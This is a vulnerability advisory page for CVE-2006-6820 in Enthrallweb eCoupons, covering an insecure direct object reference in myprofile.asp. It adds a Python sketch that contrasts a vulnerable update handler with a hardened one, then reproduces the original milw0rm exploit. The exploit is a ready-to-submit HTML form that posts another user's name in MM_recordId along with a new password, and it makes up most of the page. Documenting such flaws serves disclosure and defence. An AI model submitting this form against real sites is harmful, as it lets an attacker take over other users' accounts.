Enthrallweb eCoupons 'Myprofile.ASP' Arbitrary User Password Change Vulnerability

Vulnerability ID: 1111835    Vulnerability type: Design error
Published: 2006-12-23    Updated: 2007-01-02
CVE ID: CVE-2006-6820    CNNVD-ID: CNNVD-200612-598
Platform: ASP    CVSS score: 3.5
|Vulnerability source
https://www.exploit-db.com/exploits/2995
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200612-598
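|Vulnerability details
myprofile.asp in Enthrallweb eCoupons does not properly validate the MM_recordId parameter when updating a profile. A remote authenticated user can modify certain profile fields of another account by specifying that account's username in the MM_recordId parameter.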
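
A minimal model of the flaw described above next to its fix, added here as an illustration; it is not code from eCoupons or from the advisory. The field names MM_recordId and U_PASSWORD are taken from the form on this page; the in-memory store, the session dictionary and all function names are assumptions.

```python
# Added example: constructed model of a profile-update handler, not eCoupons code.
# MM_recordId / U_* names come from the page; store and session are assumptions.
class Forbidden(Exception):
    """Raised when a request may not edit the record it targets."""

EDITABLE = {"U_PASSWORD", "U_FIRST", "U_LAST", "U_EMAIL"}  # column allow-list

def new_store():
    # Constructed sample accounts.
    return {
        "alice": {"U_PASSWORD": "alice-secret", "U_EMAIL": "alice@example.test"},
        "bob": {"U_PASSWORD": "bob-secret", "U_EMAIL": "bob@example.test"},
    }

def update_profile_vulnerable(store, session, form):
    # Flaw: being logged in is checked, but the row key is client-controlled.
    if not session.get("user"):
        raise Forbidden("login required")
    target = form["MM_recordId"]
    for key in EDITABLE.intersection(form):
        store[target][key] = form[key]
    return target

def update_profile_hardened(store, session, form):
    # Fix: the row key comes only from server-side session state.
    user = session.get("user")
    if not user or user not in store:
        raise Forbidden("login required")
    supplied = form.get("MM_recordId")
    if supplied is not None and supplied != user:
        # A mismatch is a tampering signal: reject it (and log it in practice).
        raise Forbidden(f"{user} attempted to edit {supplied}")
    for key in EDITABLE.intersection(form):
        store[user][key] = form[key]
    return user

def demo():
    # bob is authenticated; the form names alice as the record to update.
    session = {"user": "bob"}
    form = {"MM_recordId": "alice", "U_PASSWORD": "123456"}
    weak, strong = new_store(), new_store()
    update_profile_vulnerable(weak, session, form)
    try:
        update_profile_hardened(strong, session, form)
        rejected = False
    except Forbidden:
        rejected = True
    return weak["alice"]["U_PASSWORD"], strong["alice"]["U_PASSWORD"], rejected
```
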
|Exploit (EXP)
<form action="[target]/myprofile.asp" method="POST" name="form2">
                          <p> </p>
                          <table align="center" cellpadding="1" cellspacing="1">
                            <tr valign="baseline"> 
                              <td align="right" nowrap class="title"><strong><font face="Verdana, Arial, Helvetica, sans-serif">PASSWORD:</font></strong></td>
Change Profile UserName=><input type="text" name="MM_recordId" value="ajann">
                              <td> <input type="text" name="U_PASSWORD" value="123456" size="35" maxlength="10" class="inputFieldIE"> 
                              </td>
                            </tr>

                            <tr valign="baseline"> 
                              <td align="right" nowrap class="title"><strong><font face="Verdana, Arial, Helvetica, sans-serif">FIRST:</font></strong></td>
                              <td> <input type="text" name="U_FIRST" value="000245" size="35" class="inputFieldIE"> 
                              </td>
                            </tr>
                            <tr valign="baseline"> 
                              <td align="right" nowrap class="title"><strong><font face="Verdana, Arial, Helvetica, sans-serif">LAST:</font></strong></td>
                              <td> <input type="text" name="U_LAST" value="000245" size="35" class="inputFieldIE"> 
                              </td>

                            </tr>
                            <tr valign="baseline"> 
                              <td align="right" nowrap class="title"><strong><font face="Verdana, Arial, Helvetica, sans-serif">ADDRESS:</font></strong></td>
                              <td> <input type="text" name="U_ADDRESS" value="" class="inputFieldIE" size="35"> 
                              </td>
                            </tr>
                            <tr valign="baseline"> 
                              <td align="right" nowrap class="title"><strong><font face="Verdana, Arial, Helvetica, sans-serif">CITY/TOWN:</font></strong></td>
                              <td> <input type="text" name="U_CITY" value="" size="35" class="inputFieldIE"> 
                              </td>

                            </tr>
                            <tr valign="baseline"> 
                              <td align="right" nowrap class="title"><strong><font face="Verdana, Arial, Helvetica, sans-serif">STATE/PROVINCE:</font></strong></td>
                              <td> <input type="text" name="U_STATE" value="" size="35" class="inputFieldIE"> 
                              </td>
                            </tr>
                            <tr valign="baseline"> 
                              <td align="right" nowrap class="title"><strong><font face="Verdana, Arial, Helvetica, sans-serif">ZIP/POSTAL:</font></strong></td>
                              <td> <input type="text" name="U_ZIP" value="" size="35" class="inputFieldIE"> 
                              </td>

                            </tr>
                            <tr valign="baseline"> 
                              <td align="right" nowrap class="title"><strong><font face="Verdana, Arial, Helvetica, sans-serif">EMAIL:</font></strong></td>
                              <td> <input type="text" name="U_EMAIL" value="ajannhwt@hotmail.com" size="35" class="inputFieldIE"> 
                              </td>
                            </tr>
                            <tr valign="baseline"> 
                              <td align="right" nowrap class="title"><strong><font face="Verdana, Arial, Helvetica, sans-serif">PHONE:</font></strong></td>
                              <td> <input type="text" name="U_PHONE" value="" size="35" maxlength="15" class="inputFieldIE"> 
                              </td>

                            </tr>
                            <tr valign="baseline"> 
                              <td align="right" nowrap class="title"><strong><font face="Verdana, Arial, Helvetica, sans-serif">FAX:</font></strong></td>
                              <td> <font size="1"> <i> <font face="Verdana, Arial, Helvetica, sans-serif"> 
                                </font><font size="1"><i><font face="Verdana, Arial, Helvetica, sans-serif"> 
                                <input type="text" name="U_FAX" value="" size="35" maxlength="15" class="inputFieldIE">
                                </font></i></font><font face="Verdana, Arial, Helvetica, sans-serif">(Optional)</font></i></font> 
                              </td>

                            </tr>
                            <tr valign="baseline"> 
                              <td align="right" nowrap class="title"><strong><font face="Verdana, Arial, Helvetica, sans-serif">RECEIVE 
                                NEWS</font></strong></td>
                              <td> <input checked name="subscribe" type="checkbox" id="subscribe" value="checkbox"> 
                                <span class="content"> (LEAVE EMPTY TO UNSUBSCIBE)</span></td>
                            </tr>
                            <tr valign="baseline"> 
                              <td height="44" align="right" nowrap><font color="#333333"> </font></td>

                              <td> <input  name="submit" type="submit" class="Buttons" onClick="MM_validateForm('U_FIRST','','R','U_LAST','','R','U_ADDRESS','','R','U_CITY','','R','U_STATE','','R','U_ZIP','','R','U_EMAIL','','RisEmail','U_PHONE','','R','U_PASSWORD','','R');return document.MM_returnValue" value="Update"> 
                              </td>
                            </tr>
                          </table>
                          <input type="hidden" name="MM_update" value="form2">
                          
                        </form>

# milw0rm.com [2006-12-23]
|References

Source: MILW0RM
Name: 2995
Link: http://www.milw0rm.com/exploits/2995
Source: VUPEN
Name: ADV-2006-5155
Link: http://www.frsirt.com/english/advisories/2006/5155
Source: SECUNIA
Name: 23517
Link: http://secunia.com/advisories/23517
Source: BID
Name: 21739
Link: http://www.securityfocus.com/bid/21739
Source: MILW0RM
Name: 2995
Link: http://milw0rm.com/exploits/2995